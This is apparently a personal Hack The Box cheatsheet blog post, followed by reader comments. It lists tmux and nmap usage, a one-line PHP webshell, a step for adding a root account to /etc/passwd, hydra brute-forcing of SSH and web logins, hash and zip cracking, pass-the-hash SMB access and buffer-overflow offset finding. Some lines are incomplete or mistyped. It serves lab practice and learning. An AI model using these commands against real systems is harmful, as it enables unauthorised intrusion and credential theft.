Cheatsheet for HTB


Linux General

ctrl + r

Search History reverse

Run Script at startup

chmod 755 /path/to/the/script
update-rc.d /path/to/the/script defaults

update-rc.d -f /path/to/the/script remove

Delete Script from defaults


i for insert mode

esc to leave insert mode

To be continued with macros and all this handy shit


Config from ippsec.

#set prefix
set -g prefix C-a
bind C-a send-prefix
unbind C-b

set -g history-limit 100000
set -g allow-rename off

bind-key j command-prompt -p "Join pan from:" "join-pane -s '%%'"
bind-key s command-prompt -p "Send pane to:" "joian-pane -t '%%'"

set-window-option -g mode-keys vi

run-shell /opt/tmux-logging/logging.tmux

First press the prefix ctrl + a, then release the buttons and press the combination you want.

tmux new -s [Name]

new named session

prefix + c

create new window

prefix + ,

Rename window

prefix + #

change panes

prefix + w

list windows

prefix + %

vertical split

prefix + "

horizontal split

prefix + s #

join pane

prefix + z

zoom in/out to panes

prefix + !

make splitted part to own window

prefix + ]

enter vim mode -> search with ? in vi mode -> press space to start copying -> press prefix + ] to paste

alt + .

cycle through arguments in history

tmux kill-session -t X

kill session by tag

prefix + &

kill pane


nmap -sV -sC -p- -oN [FILE] [IP]


nmap -p- -sV -sC -A --min-rate 1000 --max-retries 5 -oN [FILE] [IP]

Faster But ports could be overseen because of retransmissoin cap

nmap --script vuln -oN [FILE] [IP]

Local File Inclusion

Get the contents of all PHP files in base64 without executing them.

<?php echo passthru($_GET['cmd']); ?>

PHP Webshell

Upgrade Shell

python -c'import pty; pty.spawn("/bin/bash")'

Background Session with ctrl + z

stty raw -echo

stty -a

get row & col

stty rows X columns Y

Set rows and cols

Foreground Session again

fg #jobnumber

export XTERM=xterm-color

enable clear

Add Account/Password to /etc/passwd

Generate password

openssl passwd -1 -salt [Username] [PASSWD]

Then Add to passwd file

Username:generated password:UID:GUID:root:/root:/bin/bash


Capture Request with Burp.

Save Request to File.

sqlmap -r [REQUEST] --level [X] --risk [Y]

Use SSH Key

Download & save

It is necessary to change the permissions on the key file otherwise you have to enter a password!

chmod 600 [KEY]

ssh -i [KEY] [IP]


searchsploit [TERM]

searchsploit -m exploits/solaris/local/19232.txt

Copy to local directory

Convert RPM Package to deb

alien [Pakage.rpm]


Locate Overflow

patter_create.rb -l [SIZE]

Start gdb and run


Copy the segfault String

pattern_offset.rb [SEGFAULT STRING]

Receive Match at exact offset X.

Now you know you have at X the EIP override and so much space in the buffer.

Simple exploit developement

Get Information about the binary.

checksec [Binary]

Search packetstrom for Shellcode.

Remember to use correct architecture.

Work in progress above…


Bruteforce community string

nmap -sU -p 161 [IP] -Pn --script=snmp-brute

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt [IP]

Community String is in both cases “private”

snmp-check [IP] -c public

snmpwalk -c public [IP] -v 2c


hydra -l root -p admin -t 4 ssh

hydra -L root -P File -t 4 ssh

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.X http-post-form "/login:username=^USER^&password=^PASS^:F=failed"

John the ripper

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Crack zip Files

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' ""

Note: Be careful with the quotes!

Crack openssl encrypted files

for password in $(cat /usr/share/wordlists/rockyou.txt)
openssl enc -d -aes-256-cbc -a -in file.txt.enc -k $password -out $password-drupal.txt

After this you get one file for every Password tried.

ls -lS

Sort them by size and find the one unique size. Or try to grep the content.

Pass the hash smb

With nt hash the --pw-nt-hash flag is needed, default is ntlm!

pth-smbclient \\\\\\$ -W <DOMAIN> -U <USER> -L <IP> --pw-nt-hash <HASH>

List all shares on .

pth-smbclient \\\\\\<SHAR> -W <DOMAIN> -U <USER> --pw-nt-hash <HASH>

Connect to .


wget -r ftp://user:[email protected]/

Recursively download with ftp.

SMB Null Session

smbclient //10.10.10.X/IPC$ -W Workgroup -I 10.10.10.X -U ""


wfuzz -z range,1-65600 --hc 500 "http://IP:PORT/dir?parameter=id&port=FUZZ"

Fuzz a range of ids/port numbers.

Wordlist with crunch

crunch 15 15 "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*?=walkthrough%&0123456789" -t 123456789012345@ > wordlist.txt


hashcat --force -m 1400 --username hash.txt /usr/share/wordlists/rockyou.txt 

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 2

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?


  1. Louis

    Hi, i think that i saw you visited my blog so i came to “return the favor”.I’m attempting to
    find things to enhance my site!I suppose its ok to use some of your ideas!!

  2. You can certainly see your expertise within the article you write.
    The world hopes for more passionate writers like you who are not afraid to say how they believe.

    At all times follow your heart.

  3. What’s Happening i am new to this, I stumbled upon this I have discovered
    It positively helpful and it has aided me out loads.

    I’m hoping to contribute & assist other customers like its helped me.
    Good job.

  4. Good day! I know this is kinda off topic but I was wondering if you knew where I could find a captcha plugin for
    my comment form? I’m using the same blog platform as yours and I’m having trouble finding one?

    Thanks a lot!

  5. Quality content is the key to be a focus for the people to pay a visit the website, that’s what
    this website is providing.

    • admin

      Thanks for your kind words it really motivated me

  6. This is really interesting, You’re a very skilled blogger.
    I have joined your rss feed and look forward to seeking more of your
    fantastic post. Also, I have shared your website in my social networks!

  7. Hiya, I am really glad I’ve found this info. Today bloggers publish just about gossip and internet stuff and this is actually frustrating. A good web site with interesting content, that’s what I need. Thank you for making this site, and I’ll be visiting again. Do you do newsletters by email?

  8. Yesterday, while I was at work, my sister stole my iPad and tested to see if it can survive a thirty foot drop, just so she can be a youtube sensation. My apple ipad is now broken and she has 83 views. I know this is totally off topic but I had to share it with someone!

  9. 카지노사이트

    I discovered your weblog web site on google and examine a number of of your early posts. Continue to keep up the superb operate. I just further up your RSS feed to my MSN News Reader. Searching for forward to reading extra from you in a while!…

Leave a Reply

Your email address will not be published. Required fields are marked *